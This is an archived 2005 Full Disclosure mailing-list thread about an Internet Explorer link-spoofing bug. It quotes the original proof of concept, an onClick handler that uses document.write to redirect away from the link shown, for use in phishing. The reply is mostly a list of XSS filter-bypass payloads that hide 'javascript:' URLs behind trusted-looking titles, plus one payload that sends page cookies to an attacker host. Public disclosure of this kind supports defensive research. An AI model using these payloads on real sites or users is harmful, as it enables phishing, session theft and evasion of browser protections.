Full Disclosure mailing list archives
Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
From: Jerome Athias <jerome.athias () free fr>
Date: Thu, 20 Oct 2005 19:23:33 +0200
You can then mix it with some classical XSS tricks like Basic XSS test detected: <a href="javascript:alert('XSS')" title="http://www.google.com">hello0</a> <a href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?' +document.cookies</script>">Click here</a> Basic XSS test : <a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com">hello0</a> UTF-8: <a href="javascript:alert('XSS')" title="http://www.google.com">hello</a> Long UTF-8 Unicode encoding without semicolons: <a href= javascript:alert('XSS') title="http://www.google.com" onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a> Embedded newline to break up XSS: <a href=jav
ascript:alert('XSS'); title="http://www.google.com" hover="http://www.google.com">hello2</a> Embedded carriage return to break up XSS (doesn't appear as link): <a href=jav
ascript:alert('XSS'); title="http://www.google.com" onmouseover="image(this.href);">hello3</a> Inserting spaces in href link: <a href=" javascript:alert('XSS');" title="http://www.google.com">hello4</a> etc... some bypass the Opera anti-illegal-urls K-Gen Gen wrote:
New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Gr337s .. I (K-Gen) have found a new (I think..) URL spoofing bug in IE. Affected : All MS-IE Browsers (Win XP SP2 as well). This allows a malicious website to host a specially crafted A HREF tag that shows to the user as a link to one location, but actually redirects to another. This can be used in Phishing scams and other malicious attacks. The basic idea here is to write a geniune <a href=""> </a>tag but include an onClick event handeler that will redirect (window.location="";) to another page. The next example won't work: <a href="http://microsoft.com" onClick="window.location='http://google.com';">Microsoft</a> Probably there is some protection in IE .. but not enough :) If we try the next thing: <a href="http://microsoft.com" onClick="alert()">Microsoft</a> An alert WILL pop-up before redirecting. The same thing will happen to the document.write(""); method, it will execute before redirection. Hence, the next Proof of Concept: <a href="http://microsoft.com" onClick="document.write(unescape('%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e'))">Microsoft</a> Put the code into an HTML page and see for yourself. In the status bar and in the properties the link appears as http://microsoft.com , but if you click on the link it will redirect you to http://google.com . I used unescape becuse characters like < > and ' cause run-time errors... This is not extremely critical as the old %01@ bug (That still works on my IE sp1 :lol:), becuase It does not obscure the real link in the Address bar, but i bet there will be a PoC for this one too, sooner or later... Have a Nice Day. K-Gen _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). K-Gen Gen (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Mike Camden (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Jerome Athias (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Justin Allen (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Raoul Nakhmanson-Kulish (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Raoul Nakhmanson-Kulish (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Mike Camden (Oct 20)